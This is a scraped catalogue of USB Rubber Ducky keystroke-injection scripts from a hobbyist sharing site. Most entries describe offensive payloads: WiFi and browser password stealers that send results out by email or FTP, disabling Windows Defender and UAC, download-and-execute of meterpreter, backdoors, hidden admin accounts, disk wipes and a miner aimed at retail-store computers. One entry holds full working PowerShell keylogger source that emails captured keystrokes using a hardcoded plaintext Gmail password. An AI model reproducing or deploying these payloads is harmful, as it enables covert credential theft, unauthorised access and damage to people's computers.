windows defender, admin,wifi password, backdoor spyder hello this is my 2nd script that i will have shared yay! anyway it will give you the wifi password and i must thank Siem for his wifi code for the duck and i took some parts out of it for instance the emailing the password to your gmail i took that out cause it didnt work for me. and i really dont suggest using this as your attack method well not this code but take parts that you want or just use it all if you want its a free world that one day someone will take over which are the Rocthchilds and yes i don't know how to spell their name cause they suck. 2017-09-13 19:51:25.869000
blocked cmd HitchHiker && Spyder this code is to get past a blocked cmd for instance at school public to be specific any way all the credit goes to the amazing HitchHiker who came up with the code to do it and im just the person who knows how to use duck code so if you must thank him 2017-09-14 20:00:25.344000
Disable Windows defender on Small laptop Like Eee Pc Small script that disables Windows Defender on small screen laptop, like Asus Eee pc & Others 2017-09-18 00:03:54.510000
ULTRA ducky flasher 19273 2017-09-23 20:59:09.149000
ULTRA DUcky flasher shitts 2017-09-23 21:00:08.362000
mimikatz /w log on windows 10 Opaque ****Must have Twin Duck*****This is for windows 10. It will disable windows defender so that the mimikatz payload can run. Change the file name of Mimikatz.exe to mimi.exe. Also added a log file of the read out to get piped back to the ducky drive. Mimikatz,Windows 10, Windows Defender 2017-09-24 02:14:44.952000
OSX Spooky Script (Website Open and CLI History Shown) @VDIHacker OSX Spooky Script. Opens Safari and show the CLI History. Since there are not a lot of scripts out here for MAC OS X, this was made for a client to show that something plugging into their USB even on MACs is something to be worried about. OSX,Safari,History 2017-10-05 01:34:07.798000
MAC Desktop Copy efdutra Copies all contents on a Mac OSx Desktop to the Rubber Ducky. Use the Twin Ducky Firmware There are 2 options on the Payload, i divided it with "REM ================================" So, please, just copy the one you want (between those separators), DONT COPY IT ALL ps: Delay times were calculated based on my tests on differents Macs. macosx, copy 2017-10-10 18:30:29.254000
MAC Desktop Copy - FIXED efdutra Same as before, but now fixed. leaving no trace behind. Make sure your usb is named USB, or change on the script. ps: Delay times were calculated based on my tests on differents Macs. macosx, copy 2017-10-10 19:40:02.081000
Prank Shadowkiller324 RickRoll for Slow-ish Windows Computer that attempts to self hide may or may not hide properly rickroll 2017-10-13 02:37:55.160000
File Snatcher Shadowkiller324 A very simple program that should (In theory) find a specific file and paste it to a removable E drive Copies specified file 2017-10-13 06:55:34.555000
Ezpzloads funnyguy123 idk funny:D having fung 2017-10-16 10:28:51.172000
Dan Dan Augest This is a wifi password, Graber. hack 2017-10-22 22:58:06.230000
Chrome Homepage Prank RCKid Chrome homepage prank that sets the homepage to www.bronymate.com. Works with newest version of chrome. Created 10/26/2017. Must have vanilla settings as far as startup pages go. prank, chrome, brony 2017-10-26 19:01:21.871000
Download/save/rename/execute a file Bafil This script download a file from internet (any extension), create a stealth dir on local pc, and save the downloaded file on it, and execute it. replace http://www.yoursite.com/filename.exe with your address site and file name replace .MIA with name you want. is useful the function for change name of file on saving it; for example, if you have an .exe on remote site, you can rename it as .txt (to avoid problems with antivirus), and save it as .exe automatically. Tested on Win7 and 10 Have fun ;) Bafil joseph.fenoli@hotmail.com 2017-10-29 18:42:39.171000
Browser password grabber austin_s14 I got the idea of this from "HexHax" payload "Password and Network Config Grabber" Takes browser passwords and sends them to an account on drivehq.com via ftp make a free account at drivehq.com Change "PASS" and "USER" to your drivehq info! Download webbrowserpassview.exe from nirsoft website Upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq Password, Windows, Password Grabber 2017-10-31 01:57:41.336000
Browser password grabber austin_s14 I got the idea of this from "HexHax" payload "Password and Network Config Grabber" Takes browser passwords and sends them to an account on drivehq.com via ftp make a free account at drivehq.com Change "PASS" and "USER" to your drivehq info! Download webbrowserpassview.exe from nirsoft website Upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq Password, Windows, Password Grabber 2017-10-31 01:57:49.467000
Awareness Demo DWE Simple script to demonstrate users how a system can be infected without internet connection or filecopy. We use the editor instead of a powershell script, because we WANT that users will see what happen. self-generated code, awareness 2017-11-02 15:11:14.268000
Download exe and run with VBscript Ammarit Thongthua,Shellcodenoobx Download exe and run with VBscript Download 2017-11-10 04:40:43.599000
Paypal Exploitation Script Zacablaze Paypal Exploitation Script !NEEDS IMPROVEMENT! Paypal, windows, not tested, 2017-11-10 07:41:32.596000
201 most common passwords Zacablaze 201 most common passwords add your own delays password, ducky, 2017-11-10 22:59:18.833000
Download exe and run with VBscript #2 Ammarit Thongthua,Shellcodenoobx Download exe and run with VBscript (Version 2) to download a large size file to run as exe Download exe and run 2017-11-13 10:15:58.263000
test test test test 2017-11-14 16:04:21.706000
Rick Roll windows Justice514 Rick Roll In Chrome swap STRING chrome.exe https://youtu.be/oHg5SJYRHA0?t=43s with STRING iexplore.exe https://youtu.be/oHg5SJYRHA0?t=43s to use in internet explorer however full screen will not work. rickroll, windows, chrome 2017-11-17 11:59:50.515000
NETWORK KILLER SOMEGUY NETWORK TROLLING 2017-11-24 05:16:25.422000
sardame @hi hiiiii this a test simple 2017-11-25 15:35:53.259000
R3hab R3hab Disable Defender. Download and execute meterpreter payload from " Apache " Meterpreter, Defender, Powershell 2017-11-25 17:41:35.206000
Payload Downloader And Executer R3hab Disables Defender. Downloads and execute's meterpreter payload. ( Tested on Windows 10 ) Meterpreter, Metasploit, Defender 2017-11-25 17:47:17.576000
Payload Downloader And Executer R3hab Disables Defender. Downloads and execute's meterpreter payload. ( Tested on Windows 10 ) Meterpreter, Metasploit, Defender 2017-11-25 17:49:46.714000
macOS Hello World Martian Packet Simple "Hello World" example for macOS. macOS 2017-12-07 21:27:14.760000
sdfsdfs dfsdfsdf sdfsdfsdf sdfsdfsdf 2017-12-22 11:47:08.590000
Open CD Drive kjvkjvop Type in all the needed text for ejecting the cd drive, and then save it in %USERPROFILE%, and then executing it, making it run invisibly. To stop it you have to go to Task Manager and stop the wscript.exe file. Please tell me on kjvkjvop@gmail.com, if there is a problem with the code. I haven't gotten my own Rubber Ducky yet. CD Drive 2017-12-23 13:17:15.080000
Fork bomb C.A.N.P. This bat file overload the processor. Fork bomb 2017-12-27 15:44:49.493000
You got pranked Zack .S Prank someone with this. prank,joke 2018-01-24 02:29:27.618000
ihasabucket.com Zack .S Opens 20 tabs of ihasabucket.com Joke, Prank 2018-01-24 02:43:44.917000
Windows Reboot @TnXTyler Just a simple script I made to reboot a Windows Machine. reboot 2018-01-27 15:30:38.429000
exfiltration and web passwords anonymous will get all web passwords and will steal documents format your drive letter to D: must have webbrowserpassview(command line version) named p on usb must have hak5 usb rubber ducky exfiltration payload (delete d.cmd but keep all other files) on usb does not require twin duck, only usb with drive letter D: efiltration,web passwords 2018-01-28 07:57:16.996000
PornPrank @ BOIInotreallymyinsta Open PORNHUB automatically when someone starts google chrome. Enjoy (: PornPrank, Funny, Boi 2018-02-04 04:39:04.584000
test test test test 2018-02-11 19:48:15.643000
Windows 10 - WiFi password grabber (german language setting) ssrmpc This script is written for Windows 10 with german language settings. Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt to your gmail account. This script is an encancement of an already existing password grabber (created by Siem TTommy) in order to deal with Windows 10 set to german. Please note that the GUI and MENU commands must use the language specific letter SSID, Network type, Athentication, WLAN Password 2018-02-22 09:27:29.265000
Windows 10 Powershell - Email a text file (content) to your Gmail account ssrmpc This is a snipplet! The file (Log.txt) must have been created Email a text file (content) to your Gmail account. Just edit the email credentials Windows 10, Powershell, Gmail 2018-02-22 09:50:27.536000
pinco pallino pinco pallino 123 2018-02-27 16:58:25.319000
Disable WINDOWS DEFENDER 666ANON777@protonmail.com ONLY WORKS TO TURN WINDOWS DEFENDER OFF if UAC is enabled you have to add code to disable UAC or code to click yes on UAC Prompts tested on windows 10 Version 1709 (OS Build 16299.125) Disable WINDOWS DEFENDER, WINDOWS 10 2018-03-14 05:25:26.327000
Check Windows 10 Build Version 666ANON777@protonmail.com Check Windows 10 Build Version 2018-03-14 05:32:23.423000
More Than A Rickroll Ethan Roy Ultimate Prank with Rickroll. (Windows Only) prank, ducky 2018-03-18 20:13:38.979000
Crypto-Currency Miner Jadon Linden Downloads Minergate and installs to mine crypto-curriences on computers. Mainly targeted to auto-deploy at computers at Best Buy, Walmart, etc. You might have to adjust some delays due to different WIFI speeds, since my WIFI is fast. But it should work, if not, it's that then. #miner #minergate #bitcoin #monero #badusb #payload 2018-03-20 02:12:23.214000
WiFi Password Exfiltration https://twitter.com/tylertechnz This script is similar to other WiFi password exfiltration scripts you may have seen, except this one takes all of the WiFi networks the target computer has ever connected to, then clean up after itself so the target will not have any evidence you were there. The best part is that this script also works on non-admin accounts, and only takes about 30 seconds to complete. All you need to change is the SENDERSEMAIL@GMAIL.COM, RECEIVERSEMAIL@GMAIL.COM and SENDERSPASSWORD. All of these details are in line 43, below the "Email CSV via GMAIL" comment. If you're not using a Gmail account to send the email you'll also need to change the SMTP server from smtp.gmail.com and maybe the port (currently 587 in this version of the script). wifi, email, password 2018-03-22 21:59:32.677000
Wallpaper Windows 10 Nuke Wallpaper prank Windows 10 - Pegadinha papel de parede Windows 10 Prank, wallpaper 2018-03-29 14:29:42.984000
No Internet Sc1pt3r This script will disable your targets internet connection until you re-enable it with "ipconfig /renew" 2018-03-29 23:28:20.720000
Disable audio jack Scr1pt3r This script will disable the users audio jack. To disable headphone usage: 1. Unplug headphones if they are plugged in 2. Plug in ducky 3. Once the powershell windows disappears wait about 3 seconds to make sure the process has ended 4. Unplug ducky and plug headphones back in 5. Watch and laugh when the user goes to play music and everyone hears it No Headphones, Prank 2018-03-29 23:37:53.653000
No Internet *Fixed Scr1pt3r Fixed script problems Prank, No internet 2018-03-30 00:23:15.361000
Time Message Scr1pt3r This script will replace the current time with a message for your target Prank, No Time, Message 2018-04-01 22:16:39.812000
Savage Mee Fake Hacked screen Fake Hcked 2018-04-08 15:43:37.311000
Hackertyper Prank Alex B Open hackertyper and just "hacks" away resulting in a successful "hack". prank,hackertyper,crazy,lol 2018-04-12 14:08:20.563000
Wndows 10 Desktop Ducky Monte Carlo Change someone's Desktop Wallpaper to a Ducky :D Works on WIndows 10 ducky,duck,desktop,background,prank,:D 2018-04-22 23:40:04.682000
x360G1EE Bog and Austin First build April 25th, 2018 2018-04-25 19:11:26.484000
sent mail using gmail knakie96 sent mail using gmail account. it depends how fast your internet is how long the delay's are so be smart. :) usb, mail, gmail.sent, rubber ducky 2018-04-29 19:57:44.593000
Custom mimikatz payload itsme A slightly modified version of https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mimikatz-payload that saves the output of mimikatz to the sd card and cleans up afterwards Passwords,Exfiltration,Twin Duck 2018-04-30 03:43:21.297000
Custom mimikatz payload (Fixed) itsme A slightly modified version of https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mimikatz-payload Takes about 43 seconds to execute on a decently fast computer (Fixed version) Passwords,Exfiltration,Twin Duck 2018-04-30 03:58:39.673000
Rubber Ducky Keylogger NEED HELPS @aJte38 Hello, I'm new with all of this stuff, I'm trying to make a keylogger which will be on the usb rubber ducky and when it's plug into a pc the ducky_code will copy this keylogger into the startup folder of the victim's computer. I don't know all command and I didn't find the solution, so I hope somebody will help me. I take the keylogger on the net, in Python 3.5 keylogger 2018-05-03 19:41:13.925000
delete chrome history knakie96 deletes google chrome internet history chrome, delete, history 2018-05-06 15:01:42.581000
Documents and Downloads Copier @ItzEdInYourBed Ducktoolkit.com, any of it's users, it's owners, and I are NOT responsible for what you do with this!! Copies all contents of documents folder and downloads folder onto your Rubber Ducky. Requirements: TwinDuck Firmware Suggested: A large micro SD card - Experience has taught me that people like to keep files in these two folders. For contact find me on Twitter @ItzEdInYourBed I'm also on RaidForums.com windows, copier, stealer, TwinDuck, 2018-05-08 18:05:08.721000
Chrome password stealer https://twitter.com/UGame10 This only works for windows! This script will steal the local password for chrome in about 10 sec and send it to your preferred gmail. You can change delays for slower computers. You can also delete the the GUI L in the end, that only locks the computer in the end of the script. 2018-05-09 18:00:28.540000
++J0nNy#BaNanA++ ++J0nNy#BaNanA++ A pair of fast solutions to disable UAC (User Account Control) it works on all windows version 32 and 64 bits with uac (Vista or Earlier) and are valid for all languages (Latin, of course). The scripts were created with the Italian keyboard, so I do not exclude that in some cases they require minor adjustments. if the target machine is old, I recommend extending the delay time. view on github: https://github.com/JonnyBanana/QuickUACk uac disable-uac quick-uac user-accouunt disable-user-account exploit-windows 2018-05-11 02:18:43.106000
Chromebook crasher xFaraday Opens a new tab in chrome and strings out either "chrome://inducebrowsercrashforrealz/" or "chrome://quit/" into the url forcing the chrome application to close and crash. This gives the OS built around chrome to freak out and often blank screen for a little while. 2018-05-15 14:21:24.816000
Upside Down l1nd1l - Make a screenshot and rotate it in paint. - Set new flipped screenshot as background. - Hide all desktop-icons. - Hide Taskbar. - Rotate screen itself. Flip, Windows 10, Rotate, Wallpaper 2018-05-23 12:09:50.606000
Create file on host l1nd1l - Create a file over Powershell - Write some text into the file - Open the file after a while with notepad Windwos 10, create a file, Powershell 2018-05-23 12:17:53.333000
rickroll prank duckcoder This code will make a vbs file to turn the volume op and open never gonna give you up 10 hours and open fakeupdate:net and use the fake windows 10 update screen rickroll,10hours 2018-06-14 09:39:13.406000
download program, run the program at startup of the computer :) change mediafile with url change name with file change onoma arxiou with file otinane 2018-06-17 12:05:13.926000
download program, run the program at startup of the computer youtube pc/android/ios hack change mediafile with url change name with file change names file with file 2018-06-17 12:11:12.369000
windows destroyer duckcoder this will destroy any windows pc 7 or higher you might have to edit a few special letters windows,destroyer 2018-06-18 06:24:20.152000
AddEmp (Win10) K2 Creating a new local admin user on Windows 10. Add,Employer,Emp,Account,Admin,Windows,10,Payload,Ducky,Quick 2018-06-22 14:35:42.153000
Rick Roll Windows Chris.F Rick Roll. It uses Power Shell to Turn Up the Volume. Will open YouTube Never Gonna Give you up and enter into Full Screen. Used on Windows. Rick Roll 2018-06-22 15:38:40.813000
EvilOSX Marten4n6 Download and execute EvilOSX from the given host, feel free to mess around with the delays. See: https://github.com/Marten4n6/EvilOSX rat, reverse-shell 2018-06-23 10:43:37.164000
KCSEC - Powershell FOD Script for TwinDuck (Special 2) KCSEC KCSEC - Powershell FOD Script for TwinDuck (Special 2) --By KCSEC as part of the toolkit here --https://github.com/KCSEC/USB-Rubber-Ducky KCSEC;fod;powershell;bypass;windows 10 2018-07-06 22:20:10.875000
Windows 10 Update Prank ATTR1TION This is a simple script that opens a web page and sends the target to fakeupdate.net and tricks them into believing their computer is being updated. Windows, Windows10, Prank 2018-07-19 23:06:47.035000
DORRIAN Kill Windows! Test on windwos 7! #D25 2018-07-25 12:52:49.197000
Kill windows! Dorrian Kill Windows! Test on windows 7! 2018-07-25 12:54:51.086000
Windows Kill V2 Dorrian Windows Kill! 2018-07-25 13:22:04.080000
Xmas tree Ejemplo de ejecucion del notepad 2018-07-30 21:38:42.277000
Chromebook Enrollment graves Chromebook Enrollment Script (Lenovo 500e Chromebook) Chromebook Enrollment 2018-08-01 13:36:17.213000
CMD with UAC (Not Tested) PR0XY#8008 Makes cmd.bat file to access cmd with user account control on (not tested) (first script) 2018-08-09 15:10:10.961000
PaSSwodStealler Rams3sTh3S3c0nd YOU NEED TWINDUCKY Password Google 2018-08-27 18:03:49.341000
Windows password change, 2 sec Rubber Duck Payload to change windows password to "password", in less than 2 seconds... Windows, Password, Bypass 2018-09-01 15:33:12.155000
Galaxy S8 Android 8.0.0 DEV_ADB_APPMON Phazedroid THIS SCRIPT WAS MADE FOR GALAXY S8 ANDROID 8.0.0 - MAY WORK ON OTHERS! DESCRIPTION: In 40s OR LESS = ENABLES DEVELOPER MODE ENABLES ADB DEBUGGING DISABLES ANDROID APP MONITOR REQUIRED: YOU WILL NEED TO KNOW/ENTER THE SECURITY PATTERN/PASS FOR THIS TO WORK! (DEV MODE ENABLE) CAUTION: SCRIPT WILL FAIL if DEVELOPER MODE IS ALREADY ENABLED! CAUTION: SCRIPT WILL FAIL if APP MONITOR IS ALREADY DISABLED - but DEV MODE and ADB will work. DIRECTIONS: 1. MANUALLY "CLOSE ALL APPS" BEFORE RUNNING SCRIPT! 2. INSERT RUBBER DUCKY. 3. WAIT APPROX 10 SECONDS FOR SECURITY PROMPT AND ENTER PATTERN/CODE TO ENABLE DEV MODE. 4. WAIT FOR SCRIPT TO RETURN TO HOME SCREEN AND YOU'RE DONE! Android, 8.0.0, Samsung, Galaxy S8, DEV MODE, ADB, App Permission Monitor 2018-09-07 08:40:07.120000
Reboot Windows 8 Darman Sejuk Reboot system for Windows 8 and 8.1 Windows 8, reboot, 2018-09-30 00:06:39.737000
1nsertt https://twitter.com/1nsert_nam3 This is a ducky script adds a admin account that its user name is Evil123 and its password is L00k1T. You can change it in the code because opens source LOL (windows) Admin, root, windows 2018-10-01 18:35:18.845000
d d d c 2018-10-02 17:15:22.035000
SYSTEM-Level Command Line Backdoor TechManPro Use wisely. This creates a SYSTEM level command prompt "backdoor" of sorts that can be launched in almost any "secure" Windows environment (i.e. LogonUI.exe - Lock Screen & Ctrl+Alt+Del Screen) by using the Sticky Keys shortcut (Pressing shift 5 times) or the keyboard combination Alt+Shift+PrtScr, which will launch the command prompt under the same account in which the current environment is running, i.e. SYSTEM or your user account. You WILL need existing Administrator credentials on the computer, NOT a Power User. Enjoy. If logged in as Administrator, it is completely automated. If logged in as a restricted user, you will be presented with a UAC prompt. If logged in as a Power User, the payload will likely ultimately fail. cmd,command prompt,backdoor,system,system-level,command line,windows,windows nt 2018-10-03 21:07:57.866000
asdf asdf 2018-10-15 23:10:19.265000
test # Edit only this section! $TimesToRun = 2 $RunTimeP = 1 $From = "samkhok1150@gmail.com" $Pass = "korn0809130096" $To = "tanakorn593@gmail.com" $Subject = "Keylogger Results" $body = "Keylogger Results" $SMTPServer = "smtp.mail.com" $SMTPPort = "587" $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force) ############################ $TimeStart = Get-Date $TimeEnd = $timeStart.addminutes($RunTimeP) #requires -Version 2 function Start-KeyLogger($Path="$env:temp\keylogger.txt") { # Signatures for API Calls $signatures = @' [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); '@ # load signatures and make members available $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru # create output file $null = New-Item -Path $Path -ItemType File -Force try { # create endless loop. When user presses CTRL+C, finally-block # executes and shows the collected key presses $Runner = 0 while ($TimesToRun -ge $Runner) { while ($TimeEnd -ge $TimeNow) { Start-Sleep -Milliseconds 40 # scan all ASCII codes above 8 for ($ascii = 9; $ascii -le 254; $ascii++) { # get current key state $state = $API::GetAsyncKeyState($ascii) # is key pressed? if ($state -eq -32767) { $null = [console]::CapsLock # translate scan code to real code $virtualKey = $API::MapVirtualKey($ascii, 3) # get keyboard state for virtual keys $kbstate = New-Object Byte[] 256 $checkkbstate = $API::GetKeyboardState($kbstate) # prepare a StringBuilder to receive input key $mychar = New-Object -TypeName System.Text.StringBuilder # translate virtual key $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) if ($success) { # add key to logger file [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) } } } $TimeNow = Get-Date } send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl Remove-Item -Path $Path -force } } finally { # open logger file in Notepad exit 1 } } # records all key presses until script is aborted by pressing CTRL+C # will then open the file with collected key codes Start-KeyLogger 2018-10-25 09:24:10.794000
Diskpart Clean/Format/Assign Drive Letter micool9 Automated Diskpart clean/format/assign a drive using the rubber ducky usb. If prompted admin you will have to hit yes if prompted, otherwise script will not run properly. (Tested on Windows 10) You may have to tweak the delay's to best fit your machine/size of drive etc. Otherwise it runs great, you can switch it per disk you are planning to clean and format. Once complete it exit's out of diskpart for you. DISKPART 2018-10-26 19:22:43.463000
Diskpart Clean/Format/Assign Drive Letter micool9 Automated Diskpart clean/format/assign a drive using the rubber ducky usb. Runs in Admin (Tested on Windows 10) You may have to tweak the delay's to best fit your machine/size of drive etc. Otherwise it runs great, you can switch it per disk you are planning to clean and format. Once complete it exit's out of diskpart for you. DISKPART 2018-10-26 20:34:39.732000
Website password grabber kyoceti fixed version of Rams3sth3s3c0nd password grabber. Password 2018-10-31 04:59:22.777000
Website password grabber *FIXED* kyoceti fixed version of Rams3sth3s3c0nd password grabber. (and my own since I'm a hypocrite) Password 2018-10-31 05:15:45.941000
NEXT_GEN_HELLO_WORLD Riyad Walker this will print hello world on the notepad in hackers style. helloworld,hacker 2018-11-04 07:00:08.676000
NEW Hello World Riyad Olav Walker Hello World helloworld,hacker,firstscript,notepad 2018-11-05 12:21:27.388000
Rubber-Ducky_Disable_W10-Defender_Technician-Edition Jonny Banana Rubber-Ducky_Disable_W10-Defender_Technician-Edition https://github.com/JonnyBanana/Rubber-Ducky_Disable_W10-Defender_Technician-Edition A quickly script for Rubber Ducky to disable w10 defender on large scale The first Script is the Killer, the second is the Healer In my activities as a technician I have to format many computers during the month, and as many refuse to buy the license i have to use a lot of crack (although I do not recommend every time, but the money they pull at the time ...). Since the windows 10 defenses are slightly improved compared to the previous ones (even if it is still punctured like a colander ...), I had the need to write a quick rubber ducky script that would disable Windows Defender on windows 10 platforms (the more installed system in our time). I have also added an additional script that reports UAC and windows defender to the recommended settings. The Scripts are two: Killer and Healer, the first disables and the second of course rehabilitates everything. Tested Builds:1803 (latest oct. 2018) Demo: https://www.youtube.com/watch?v=uJD7qPVojz8&t=13s disable windows 10 defender 2018-11-11 21:56:43.931000
Active Batch Executor TechManPro This script requires twin duck firmware. What it does is launch a command prompt and gets the drive letter that the SD card is mounted as by finding which drive contains the inject.bin file. It then finds any "active" batch or text file (starting with 01 and ending with an extension ending in "t", such as bat or txt) and writes each file's contents to a file of the same name and type in the temporary directory, executes it, and then removes it. This is nice for systems that prevent copying or executing from removable devices. Enjoy. batch, execution, scripts, twin duck 2018-11-12 20:28:30.734000
Tseries Destroyer Adekat04 People wanted the script so here... I don't know it it'll work 100% but this is the one I used in the video **THIS WILL ONLY WORK ON RUBBER DUCKY USB'S NOT REGULAR USB'S** Rubber Ducky : https://shop.hak5.org/products/usb-rubber-ducky-deluxe Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ 2018-11-17 20:05:53.101000
Tseries Destroyer shamansc MAC VERSION Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ 2018-11-17 20:36:02.187000
Tseries Destroyer_mac+bell shamansc MAC VERSION + SMASHED BELL Reddit Post: https://www.reddit.com/r/PewdiepieSubmissions/comments/9xz1jt/i_made_a_script_that_will_automatically_go_to/ 2018-11-17 20:48:40.815000
T-Series Destroyer v2 DiamondxCrafting Better than https://ducktoolkit.com/viewscript/5bf074a1ac04af589586b7d0/. 2018-11-17 21:13:25.950000
Matrix V3 Jozeknj This is a script originally created by Harvey, This is an updated version of the matrix cmd script. This Script has been modified to select the current active user Desktop, instead of manually changing the directory. The script also executes the matrix cmd script now. Things that could be added are: checking to see if the matrix batch file has already created or not and to delete it before running script again, OR checking to see if the matrix batch file has already been created and skip creating the batch file, but just running the matrix batch file. matrix updated version 2018-11-20 01:19:23.844000
Free Instagram Followers Hack Jadon Linden Free 500 Instagram Followers! MAKE SURE NOTHING ELSE IS OPEN WHILE DOING THIS because it will mess it up. Only works with Chrome, so make sure you have it. VERY IMPORTANT: Make sure you open the script with notepad and press CTRL+H and enter "username here" (without quotes of course) for Find What and enter your Instagram username for Replace With. Then copy the whole script and enter it into https://www.browserling.com/tools/text-repeat and enter how many times aka how many followers you want, and press Repeat then copy the whole script instagram, followers 2018-11-20 22:17:01.787000
JAR Downloader & Auto Exec Cuuky This script will download a jar file from your server, make an startup script for it so it runs on the computer all the time and and the end it will run the jar. You can choose the path of the jar by editing "C:\windows.jar", but then do it in the entire script! ------------------- ATTENTION ------------------- You HAVE to replace "%YOUR_WEBSITE%" with the website you want the jar to get downloaded from. ------------------- ATTENTION ------------------- If you want to do it like me, just upload the JAR into the "var/www/html" folder on your linux server and rename it to "dl.jar". Then replace your web adress with "%YOUR_WEBSITE%". And maybe you have to replace the F in "ALT f" in line 41 with the first letter of the word "file" in your language. In german for example it would be "ALT D" for "Datei" Have fun and happy coding :) Java,jar,autoexec,download 2018-12-05 12:50:10.188000
reboot Reboot system 2018-12-14 10:22:52.816000
test test hello test 2018-12-19 12:10:44.012000
test test hello test 2018-12-19 12:11:04.523000
Payload - Powershell Wget + Execute 2019 chati3l Este script es para bajar y ejecutar un archivo. Probado en Windows 7 SP1 con Internet Explorer 11. Comentarios a chatiel@yopmail.net Payload - Powershell Wget + Execute version 2019 Payload download + Execute, Payload - Powershell Wget + Execute 2018-12-29 03:37:08.709000
disable windows defender T3rR0rB!Tz disable windows defender 1.0 duckytoolkit,windows defender,diasable 2018-12-29 11:32:36.428000
Keiran0s Keiran1712 WiFi Grabber. Uploads to FTP Server I used a raspberry pi for this, great potential as you can hook it up to mobile data hotspot, and use it on the go. Enjoy. WiFi, FTP, Password, SSID, 2019-01-04 22:07:41.411000
USB File Exfil DoveTail USB rubber duck script to exfil documents using a second regular USB and File Explorer file types Yeet 2019-01-16 19:22:39.406000
HackingDemo (Notepad) Cloudcompany.at Notepad Demo Notepad Demo 2019-02-12 15:51:18.318000
Advertisting